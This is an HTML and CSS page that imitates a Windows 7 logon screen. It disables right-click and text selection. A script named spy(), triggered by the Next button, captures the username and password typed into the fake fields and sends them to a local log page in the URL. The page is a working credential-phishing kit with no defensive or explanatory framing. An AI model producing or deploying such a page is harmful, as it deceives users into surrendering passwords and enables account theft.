<script type="text/javascript">
var message="Sorry, right-click has been disabled";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>

<script type="text/javascript">
function spy(){
    window.location = "log.html#user=" + document.getElementById('username').value + "&pass=" + document.getElementById('password').value;
}
</script>

<style>
body {
  background: url('win7_background.jpg') #054696 no-repeat center center fixed;
user-select:none;-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
vertical-align:middle;
text-align:center;
z-index: -1;
overflow:hidden;
margin:0;
padding:0;
}

.CT {
vertical-align:middle;
position: absolute;
top: 38%;
height: 70px;
margin-left:auto;
margin-right:auto;
display:block;
width:400px;
margin-top: -5%;
font-family:Segoe UI, Arial;
font-size:23px;
color:#fff;
font-weight:normal;
text-align:center;
text-shadow: 0px 1px 5px rgba(0,0,0, 0.4);
user-select:none;-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;
}

.image_block {
position: absolute;
bottom: 17px;
left: 50%;
width: 50%;
margin: -5% 0 0 -25%;
}

p {
display:block;
float:middle;
text-align:center;
width:100%;
}

.centeragain {
width:400px;
margin:0px auto;
text-align:left;
}

.messageBox {
display:block;
color:#67A2E6;
font-family:Segoe UI, Arial;s
font-size:20px;
margin-left:auto;
margin-right:auto;
text-align:center;
user-select:none;-moz-user-select:none;-webkit-user-select:none;-ms-user-select:none;
z-index:999;
}

#black {
display:none;
}

input {
border: 1px solid #79777D;
border-radius: 3px;
width: 222px;
margin-top: 8px;
box-shadow: 1px 0px 2px #ffffff;
padding-left: 6px;
padding-bottom: 2px;
height: 22px;
}

.next {
position: absolute;
top: 198;
right:13%;
}

.shutdown {
position: absolute;
bottom: 20px;
right: 3%;
margin: -5% 0 0 -25%;
}
</style>

</head>
<body marginwidth="0" marginheight="0">





<div style="display:block;position:absolute;min-width:100%; min-height:100%;margin:0;padding:0;">
<div class="centeragain">
<div class="CT">
<img src="logonpic.png" draggable="false" ondragstart="return false;">
<div class="logonelements">
<input id="username" placeholder="User name"></input><br>
<input id="password" type="Password" placeholder="Password"></input><br><br>
<img src="cancel.png" onmouseover="this.src='cancel_hover.png'" onmouseout="this.src='cancel.png'" draggable="false" ondragstart="return false;" />
<img class="next" src="next.png" onmouseover="this.src='next_hover.png'" onmouseout="this.src='next.png'" draggable="false" ondragstart="return false;" onclick="spy()"/>
</div>
</div>
</div>
<div class="image_block">
<img src="windows.png" draggable="false" ondragstart="return false;">
</div>
<div class="shutdown">
<img src="shutdown.png" onmouseover="this.src='shutdown_hover.png'" onmouseout="this.src='shutdown.png'" draggable="false" ondragstart="return false;" />
</div>

</body></html>